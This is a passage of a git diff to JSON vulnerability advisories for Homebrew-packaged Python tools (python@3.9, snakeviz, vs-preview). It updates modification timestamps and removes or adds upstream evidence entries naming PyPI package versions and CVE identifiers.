"name": "pip", - "subject_version": "25.3", - "key": "pkg:pypi/pip@25.3", - "resource": "pip" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-python@3.9-CVE-2022-40897.json b/advisories/BREW-python@3.9-CVE-2022-40897.json index dce3937ebc..4e6876b990 100644 --- a/advisories/BREW-python@3.9-CVE-2022-40897.json +++ b/advisories/BREW-python@3.9-CVE-2022-40897.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-python@3.9-CVE-2022-40897", "published": "2026-08-13T17:29:58Z", - "modified": "2026-08-13T17:29:58Z", + "modified": "2026-09-10T20:33:57Z", "upstream": [ "GHSA-r9hx-vwmv-q579", "BIT-setuptools-2022-40897", @@ -43,14 +43,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "setuptools", - "subject_version": "80.9.0", - "key": "pkg:pypi/setuptools@80.9.0", - "resource": "setuptools" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-python@3.9-CVE-2022-40898.json b/advisories/BREW-python@3.9-CVE-2022-40898.json index 45dafb1fdb..f39388313a 100644 --- a/advisories/BREW-python@3.9-CVE-2022-40898.json +++ b/advisories/BREW-python@3.9-CVE-2022-40898.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-python@3.9-CVE-2022-40898", "published": "2026-08-13T17:29:58Z", - "modified": "2026-08-13T17:29:58Z", + "modified": "2026-09-10T20:33:57Z", "upstream": [ "GHSA-qwmp-2cf2-g9g6", "CVE-2022-40898", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "wheel", - "subject_version": "0.45.1", - "key": "pkg:pypi/wheel@0.45.1", - "resource": "wheel" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-python@3.9-CVE-2023-5752.json b/advisories/BREW-python@3.9-CVE-2023-5752.json index c6d09fed2a..e347e8a0f2 100644 --- a/advisories/BREW-python@3.9-CVE-2023-5752.json +++ b/advisories/BREW-python@3.9-CVE-2023-5752.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-python@3.9-CVE-2023-5752", "published": "2026-08-13T17:29:58Z", - "modified": "2026-08-13T17:29:58Z", + "modified": "2026-09-10T20:33:57Z", "upstream": [ "GHSA-mq26-g339-26xf", "CVE-2023-5752", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pip", - "subject_version": "25.3", - "key": "pkg:pypi/pip@25.3", - "resource": "pip" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-python@3.9-CVE-2024-6345.json b/advisories/BREW-python@3.9-CVE-2024-6345.json index 71e4ca0d55..262faf58fb 100644 --- a/advisories/BREW-python@3.9-CVE-2024-6345.json +++ b/advisories/BREW-python@3.9-CVE-2024-6345.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-python@3.9-CVE-2024-6345", "published": "2026-08-13T17:29:58Z", - "modified": "2026-08-13T17:29:58Z", + "modified": "2026-09-10T20:33:57Z", "upstream": [ "GHSA-cx63-2mw6-8hw5", "BIT-setuptools-2024-6345", @@ -43,14 +43,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "setuptools", - "subject_version": "80.9.0", - "key": "pkg:pypi/setuptools@80.9.0", - "resource": "setuptools" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-python@3.9-CVE-2025-47273.json b/advisories/BREW-python@3.9-CVE-2025-47273.json index 27104d4b74..f591ecd32a 100644 --- a/advisories/BREW-python@3.9-CVE-2025-47273.json +++ b/advisories/BREW-python@3.9-CVE-2025-47273.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-python@3.9-CVE-2025-47273", "published": "2026-08-13T17:29:58Z", - "modified": "2026-08-13T17:29:58Z", + "modified": "2026-09-10T20:33:57Z", "upstream": [ "GHSA-5rjg-fvgr-3xxf", "BIT-setuptools-2025-47273", @@ -43,14 +43,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "setuptools", - "subject_version": "80.9.0", - "key": "pkg:pypi/setuptools@80.9.0", - "resource": "setuptools" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-python@3.9-CVE-2025-8869.json b/advisories/BREW-python@3.9-CVE-2025-8869.json index 88e462b4e9..273641fb53 100644 --- a/advisories/BREW-python@3.9-CVE-2025-8869.json +++ b/advisories/BREW-python@3.9-CVE-2025-8869.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-python@3.9-CVE-2025-8869", "published": "2026-08-13T17:29:58Z", - "modified": "2026-08-13T17:29:58Z", + "modified": "2026-09-10T20:33:57Z", "upstream": [ "GHSA-4xh5-x5gv-qwph", "CVE-2025-8869", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pip", - "subject_version": "25.3", - "key": "pkg:pypi/pip@25.3", - "resource": "pip" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-python@3.9-CVE-2026-13346.json b/advisories/BREW-python@3.9-CVE-2026-13346.json index cf52a9132e..556c9605db 100644 --- a/advisories/BREW-python@3.9-CVE-2026-13346.json +++ b/advisories/BREW-python@3.9-CVE-2026-13346.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-python@3.9-CVE-2026-13346", "published": "2026-08-23T21:32:49Z", - "modified": "2026-09-02T09:45:09Z", + "modified": "2026-09-10T20:33:57Z", "upstream": [ "PYSEC-2026-3721", "CVE-2026-13346", @@ -39,14 +39,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pip", - "subject_version": "25.3", - "key": "pkg:pypi/pip@25.3", - "resource": "pip" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-python@3.9-CVE-2026-1703.json b/advisories/BREW-python@3.9-CVE-2026-1703.json index 38c36626f9..ed867aed8a 100644 --- a/advisories/BREW-python@3.9-CVE-2026-1703.json +++ b/advisories/BREW-python@3.9-CVE-2026-1703.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-python@3.9-CVE-2026-1703", "published": "2026-08-13T17:29:58Z", - "modified": "2026-08-13T17:29:58Z", + "modified": "2026-09-10T20:33:57Z", "upstream": [ "GHSA-6vgw-5pg2-w6jp", "CVE-2026-1703", @@ -39,14 +39,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pip", - "subject_version": "25.3", - "key": "pkg:pypi/pip@25.3", - "resource": "pip" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-python@3.9-CVE-2026-24049.json b/advisories/BREW-python@3.9-CVE-2026-24049.json index e83a288b35..7a94d03206 100644 --- a/advisories/BREW-python@3.9-CVE-2026-24049.json +++ b/advisories/BREW-python@3.9-CVE-2026-24049.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-python@3.9-CVE-2026-24049", "published": "2026-08-13T17:29:58Z", - "modified": "2026-08-13T17:29:58Z", + "modified": "2026-09-10T20:33:57Z", "upstream": [ "GHSA-8rrh-rw8j-w5fx", "CVE-2026-24049", @@ -39,14 +39,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "wheel", - "subject_version": "0.45.1", - "key": "pkg:pypi/wheel@0.45.1", - "resource": "wheel" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-python@3.9-CVE-2026-3219.json b/advisories/BREW-python@3.9-CVE-2026-3219.json index d4e02e0c5a..64cb553706 100644 --- a/advisories/BREW-python@3.9-CVE-2026-3219.json +++ b/advisories/BREW-python@3.9-CVE-2026-3219.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-python@3.9-CVE-2026-3219", "published": "2026-08-13T17:29:58Z", - "modified": "2026-08-13T17:29:58Z", + "modified": "2026-09-10T20:33:57Z", "upstream": [ "GHSA-58qw-9mgm-455v", "CVE-2026-3219", @@ -39,14 +39,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pip", - "subject_version": "25.3", - "key": "pkg:pypi/pip@25.3", - "resource": "pip" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-python@3.9-CVE-2026-59890.json b/advisories/BREW-python@3.9-CVE-2026-59890.json index 9f272a5955..8c2554eaa4 100644 --- a/advisories/BREW-python@3.9-CVE-2026-59890.json +++ b/advisories/BREW-python@3.9-CVE-2026-59890.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-python@3.9-CVE-2026-59890", "published": "2026-08-13T17:29:58Z", - "modified": "2026-08-13T17:29:58Z", + "modified": "2026-09-10T20:33:57Z", "upstream": [ "GHSA-h35f-9h28-mq5c", "BIT-setuptools-2026-59890", @@ -40,14 +40,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "setuptools", - "subject_version": "80.9.0", - "key": "pkg:pypi/setuptools@80.9.0", - "resource": "setuptools" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-python@3.9-CVE-2026-6357.json b/advisories/BREW-python@3.9-CVE-2026-6357.json index 1a6a5a3ec5..137a4cce97 100644 --- a/advisories/BREW-python@3.9-CVE-2026-6357.json +++ b/advisories/BREW-python@3.9-CVE-2026-6357.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-python@3.9-CVE-2026-6357", "published": "2026-08-13T17:29:58Z", - "modified": "2026-08-13T17:29:58Z", + "modified": "2026-09-10T20:33:57Z", "upstream": [ "GHSA-jp4c-xjxw-mgf9", "CVE-2026-6357", @@ -39,14 +39,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pip", - "subject_version": "25.3", - "key": "pkg:pypi/pip@25.3", - "resource": "pip" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-python@3.9-CVE-2026-8643.json b/advisories/BREW-python@3.9-CVE-2026-8643.json index 4566c3cefe..abfa0fb487 100644 --- a/advisories/BREW-python@3.9-CVE-2026-8643.json +++ b/advisories/BREW-python@3.9-CVE-2026-8643.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-python@3.9-CVE-2026-8643", "published": "2026-08-13T17:29:58Z", - "modified": "2026-08-13T17:29:58Z", + "modified": "2026-09-10T20:33:57Z", "upstream": [ "GHSA-wf93-45jw-7689", "CVE-2026-8643", @@ -39,14 +39,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pip", - "subject_version": "25.3", - "key": "pkg:pypi/pip@25.3", - "resource": "pip" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-snakeviz-CVE-2012-2374.json b/advisories/BREW-snakeviz-CVE-2012-2374.json index b1f6a9850e..ed1d80b94e 100644 --- a/advisories/BREW-snakeviz-CVE-2012-2374.json +++ b/advisories/BREW-snakeviz-CVE-2012-2374.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snakeviz-CVE-2012-2374", "published": "2026-08-13T17:34:42Z", - "modified": "2026-09-03T10:11:36Z", + "modified": "2026-09-10T20:54:15Z", "upstream": [ "GHSA-f7fv-v9rh-prvc", "CVE-2012-2374", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "tornado", - "subject_version": "6.5.8", - "key": "pkg:pypi/tornado@6.5.8", - "resource": "tornado" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-snakeviz-CVE-2014-9720.json b/advisories/BREW-snakeviz-CVE-2014-9720.json index 09e81ddc6f..cc7d899db8 100644 --- a/advisories/BREW-snakeviz-CVE-2014-9720.json +++ b/advisories/BREW-snakeviz-CVE-2014-9720.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snakeviz-CVE-2014-9720", "published": "2026-08-13T17:34:42Z", - "modified": "2026-09-03T10:11:36Z", + "modified": "2026-09-10T20:54:15Z", "upstream": [ "GHSA-8vpw-mgpf-mpvv", "CVE-2014-9720", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "tornado", - "subject_version": "6.5.8", - "key": "pkg:pypi/tornado@6.5.8", - "resource": "tornado" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-snakeviz-CVE-2023-28370.json b/advisories/BREW-snakeviz-CVE-2023-28370.json index b7ab814f51..e5f4df2aa8 100644 --- a/advisories/BREW-snakeviz-CVE-2023-28370.json +++ b/advisories/BREW-snakeviz-CVE-2023-28370.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snakeviz-CVE-2023-28370", "published": "2026-08-13T17:34:42Z", - "modified": "2026-09-03T10:11:36Z", + "modified": "2026-09-10T20:54:15Z", "upstream": [ "GHSA-hj3f-6gcp-jg8j", "CVE-2023-28370", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "tornado", - "subject_version": "6.5.8", - "key": "pkg:pypi/tornado@6.5.8", - "resource": "tornado" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-snakeviz-CVE-2024-52804.json b/advisories/BREW-snakeviz-CVE-2024-52804.json index 95a01d08c9..24fb056f0a 100644 --- a/advisories/BREW-snakeviz-CVE-2024-52804.json +++ b/advisories/BREW-snakeviz-CVE-2024-52804.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snakeviz-CVE-2024-52804", "published": "2026-08-13T17:34:42Z", - "modified": "2026-09-03T10:11:36Z", + "modified": "2026-09-10T20:54:15Z", "upstream": [ "GHSA-8w49-h785-mj3c", "CVE-2024-52804", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "tornado", - "subject_version": "6.5.8", - "key": "pkg:pypi/tornado@6.5.8", - "resource": "tornado" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-snakeviz-CVE-2025-47287.json b/advisories/BREW-snakeviz-CVE-2025-47287.json index 3ebc386aff..aae73558a7 100644 --- a/advisories/BREW-snakeviz-CVE-2025-47287.json +++ b/advisories/BREW-snakeviz-CVE-2025-47287.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snakeviz-CVE-2025-47287", "published": "2026-08-13T17:34:42Z", - "modified": "2026-09-03T10:09:39Z", + "modified": "2026-09-10T20:54:15Z", "upstream": [ "GHSA-7cx3-6m66-7c5m", "CVE-2025-47287", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "tornado", - "subject_version": "6.5.8", - "key": "pkg:pypi/tornado@6.5.8", - "resource": "tornado" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-snakeviz-CVE-2025-67724.json b/advisories/BREW-snakeviz-CVE-2025-67724.json index 918cd978d6..eabb66cd55 100644 --- a/advisories/BREW-snakeviz-CVE-2025-67724.json +++ b/advisories/BREW-snakeviz-CVE-2025-67724.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snakeviz-CVE-2025-67724", "published": "2026-08-13T17:34:42Z", - "modified": "2026-09-03T10:11:36Z", + "modified": "2026-09-10T20:54:15Z", "upstream": [ "GHSA-pr2v-jx2c-wg9f", "CVE-2025-67724", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "tornado", - "subject_version": "6.5.8", - "key": "pkg:pypi/tornado@6.5.8", - "resource": "tornado" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-snakeviz-CVE-2025-67725.json b/advisories/BREW-snakeviz-CVE-2025-67725.json index 3850ac22d5..b503ae3457 100644 --- a/advisories/BREW-snakeviz-CVE-2025-67725.json +++ b/advisories/BREW-snakeviz-CVE-2025-67725.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snakeviz-CVE-2025-67725", "published": "2026-08-13T17:34:42Z", - "modified": "2026-09-03T10:11:36Z", + "modified": "2026-09-10T20:54:15Z", "upstream": [ "GHSA-c98p-7wgm-6p64", "CVE-2025-67725", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "tornado", - "subject_version": "6.5.8", - "key": "pkg:pypi/tornado@6.5.8", - "resource": "tornado" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-snakeviz-CVE-2025-67726.json b/advisories/BREW-snakeviz-CVE-2025-67726.json index 4ae878a294..04fb750bb7 100644 --- a/advisories/BREW-snakeviz-CVE-2025-67726.json +++ b/advisories/BREW-snakeviz-CVE-2025-67726.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snakeviz-CVE-2025-67726", "published": "2026-08-13T17:34:42Z", - "modified": "2026-09-03T10:11:36Z", + "modified": "2026-09-10T20:54:15Z", "upstream": [ "GHSA-jhmp-mqwm-3gq8", "CVE-2025-67726", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "tornado", - "subject_version": "6.5.8", - "key": "pkg:pypi/tornado@6.5.8", - "resource": "tornado" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-snakeviz-CVE-2026-31958.json b/advisories/BREW-snakeviz-CVE-2026-31958.json index 81478699c2..658459d7d3 100644 --- a/advisories/BREW-snakeviz-CVE-2026-31958.json +++ b/advisories/BREW-snakeviz-CVE-2026-31958.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snakeviz-CVE-2026-31958", "published": "2026-08-13T17:34:42Z", - "modified": "2026-09-03T10:11:36Z", + "modified": "2026-09-10T20:54:15Z", "upstream": [ "GHSA-qjxf-f2mg-c6mc", "CVE-2026-31958", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "tornado", - "subject_version": "6.5.8", - "key": "pkg:pypi/tornado@6.5.8", - "resource": "tornado" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-snakeviz-CVE-2026-35536.json b/advisories/BREW-snakeviz-CVE-2026-35536.json index 03a2ce9a07..0468dce6aa 100644 --- a/advisories/BREW-snakeviz-CVE-2026-35536.json +++ b/advisories/BREW-snakeviz-CVE-2026-35536.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snakeviz-CVE-2026-35536", "published": "2026-08-13T17:34:42Z", - "modified": "2026-09-03T10:09:39Z", + "modified": "2026-09-10T20:54:15Z", "upstream": [ "GHSA-78cv-mqj4-43f7", "CVE-2026-35536", @@ -43,22 +43,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "tornado", - "subject_version": "6.5.8", - "key": "pkg:pypi/tornado@6.5.8", - "resource": "tornado" - }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "tornado", - "subject_version": "6.5.8", - "key": "pkg:pypi/tornado@6.5.8", - "resource": "tornado" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-snakeviz-CVE-2026-49853.json b/advisories/BREW-snakeviz-CVE-2026-49853.json index f22636f438..e484d400e0 100644 --- a/advisories/BREW-snakeviz-CVE-2026-49853.json +++ b/advisories/BREW-snakeviz-CVE-2026-49853.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snakeviz-CVE-2026-49853", "published": "2026-08-13T17:34:42Z", - "modified": "2026-09-03T10:09:39Z", + "modified": "2026-09-10T20:54:15Z", "upstream": [ "GHSA-3x9g-8vmp-wqvf", "CVE-2026-49853", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "tornado", - "subject_version": "6.5.8", - "key": "pkg:pypi/tornado@6.5.8", - "resource": "tornado" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-snakeviz-CVE-2026-49854.json b/advisories/BREW-snakeviz-CVE-2026-49854.json index e5f9f26e4a..dca612f1ae 100644 --- a/advisories/BREW-snakeviz-CVE-2026-49854.json +++ b/advisories/BREW-snakeviz-CVE-2026-49854.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snakeviz-CVE-2026-49854", "published": "2026-08-13T17:34:42Z", - "modified": "2026-09-03T10:11:36Z", + "modified": "2026-09-10T20:54:15Z", "upstream": [ "GHSA-cx3h-4qpv-8hc9", "CVE-2026-49854", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "tornado", - "subject_version": "6.5.8", - "key": "pkg:pypi/tornado@6.5.8", - "resource": "tornado" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-snakeviz-CVE-2026-49855.json b/advisories/BREW-snakeviz-CVE-2026-49855.json index 62c8a83389..00ab2e5670 100644 --- a/advisories/BREW-snakeviz-CVE-2026-49855.json +++ b/advisories/BREW-snakeviz-CVE-2026-49855.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snakeviz-CVE-2026-49855", "published": "2026-08-13T17:34:42Z", - "modified": "2026-09-03T10:11:36Z", + "modified": "2026-09-10T20:54:15Z", "upstream": [ "GHSA-mgf9-4vpg-hj56", "CVE-2026-49855", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "tornado", - "subject_version": "6.5.8", - "key": "pkg:pypi/tornado@6.5.8", - "resource": "tornado" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-snakeviz-CVE-2026-82397.json b/advisories/BREW-snakeviz-CVE-2026-82397.json index b5b96f423c..3103099898 100644 --- a/advisories/BREW-snakeviz-CVE-2026-82397.json +++ b/advisories/BREW-snakeviz-CVE-2026-82397.json @@ -2,10 +2,11 @@ "schema_version": "1.7.3", "id": "BREW-snakeviz-CVE-2026-82397", "published": "2026-09-03T10:11:36Z", - "modified": "2026-09-03T10:11:36Z", + "modified": "2026-09-10T20:54:15Z", "upstream": [ "GHSA-mpf4-983q-p7j4", - "CVE-2026-82397" + "CVE-2026-82397", + "PYSEC-2026-3928" ], "affected": [ { diff --git a/advisories/BREW-vs-preview-CVE-2014-1829.json b/advisories/BREW-vs-preview-CVE-2014-1829.json index f426979196..f8d0fc5201 100644 --- a/advisories/BREW-vs-preview-CVE-2014-1829.json +++ b/advisories/BREW-vs-preview-CVE-2014-1829.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-vs-preview-CVE-2014-1829", "published": "2026-08-13T17:48:55Z", - "modified": "2026-08-13T17:48:55Z", + "modified": "2026-09-10T21:20:25Z", "upstream": [ "GHSA-cfj3-7x9c-4p3h", "CVE-2014-1829", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "requests", - "subject_version": "2.32.5", - "key": "pkg:pypi/requests@2.32.5", - "resource": "requests" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-vs-preview-CVE-2014-1830.json b/advisories/BREW-vs-preview-CVE-2014-1830.json index 9999262e8f..e6bea63f6f 100644 --- a/advisories/BREW-vs-preview-CVE-2014-1830.json +++ b/advisories/BREW-vs-preview-CVE-2014-1830.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-vs-preview-CVE-2014-1830", "published": "2026-08-13T17:48:55Z", - "modified": "2026-08-13T17:48:55Z", + "modified": "2026-09-10T21:20:25Z", "upstream": [ "GHSA-652x-xj99-gmcc", "CVE-2014-1830", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "requests", - "subject_version": "2.32.5", - "key": "pkg:pypi/requests@2.32.5", - "resource": "requests" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-vs-preview-CVE-2015-2296.json b/advisories/BREW-vs-preview-CVE-2015-2296.json index 954222bd50..c734b66e6b 100644 --- a/advisories/BREW-vs-preview-CVE-2015-2296.json +++ b/advisories/BREW-vs-preview-CVE-2015-2296.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-vs-preview-CVE-2015-2296", "published": "2026-08-13T17:48:55Z", - "modified": "2026-08-13T17:48:55Z", + "modified": "2026-09-10T21:20:25Z", "upstream": [ "GHSA-pg2w-x9wp-vw92", "CVE-2015-2296", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "requests", - "subject_version": "2.32.5", - "key": "pkg:pypi/requests@2.32.5", - "resource": "requests" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-vs-preview-CVE-2016-9015.json b/advisories/BREW-vs-preview-CVE-2016-9015.json index 3b653a3b32..84b07e009d 100644 --- a/advisories/BREW-vs-preview-CVE-2016-9015.json +++ b/advisories/BREW-vs-preview-CVE-2016-9015.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-vs-preview-CVE-2016-9015", "published": "2026-08-13T17:48:55Z", - "modified": "2026-08-13T17:48:55Z", + "modified": "2026-09-10T21:20:25Z", "upstream": [ "GHSA-v4w5-p2hg-8fh6", "CVE-2016-9015", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.6.3", - "key": "pkg:pypi/urllib3@2.6.3", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-vs-preview-CVE-2017-18342.json b/advisories/BREW-vs-preview-CVE-2017-18342.json index f664437d09..be334cb74c 100644 --- a/advisories/BREW-vs-preview-CVE-2017-18342.json +++ b/advisories/BREW-vs-preview-CVE-2017-18342.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-vs-preview-CVE-2017-18342", "published": "2026-08-13T17:48:55Z", - "modified": "2026-08-13T17:48:55Z", + "modified": "2026-09-10T21:20:25Z", "upstream": [ "GHSA-rprw-h62v-c2w7", "CVE-2017-18342", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pyyaml", - "subject_version": "6.0.3", - "key": "pkg:pypi/pyyaml@6.0.3", - "resource": "pyyaml" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-vs-preview-CVE-2018-18074.json b/advisories/BREW-vs-preview-CVE-2018-18074.json index c323398c6c..2f6649a91a 100644 --- a/advisories/BREW-vs-preview-CVE-2018-18074.json +++ b/advisories/BREW-vs-preview-CVE-2018-18074.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-vs-preview-CVE-2018-18074", "published": "2026-08-13T17:48:55Z", - "modified": "2026-08-13T17:48:55Z", + "modified": "2026-09-10T21:20:25Z", "upstream": [ "GHSA-x84v-xcm2-53pg", "CVE-2018-18074", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "requests", - "subject_version": "2.32.5", - "key": "pkg:pypi/requests@2.32.5", - "resource": "requests" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-vs-preview-CVE-2018-20060.json b/advisories/BREW-vs-preview-CVE-2018-20060.json index 076bba7fb9..070b53f3aa 100644 --- a/advisories/BREW-vs-preview-CVE-2018-20060.json +++ b/advisories/BREW-vs-preview-CVE-2018-20060.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-vs-preview-CVE-2018-20060", "published": "2026-08-13T17:48:55Z", - "modified": "2026-08-13T17:48:55Z", + "modified": "2026-09-10T21:20:25Z", "upstream": [ "GHSA-www2-v7xj-xrc6", "CVE-2018-20060", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.6.3", - "key": "pkg:pypi/urllib3@2.6.3", - "resource": "urllib3" - }, { "strategy": "registry", 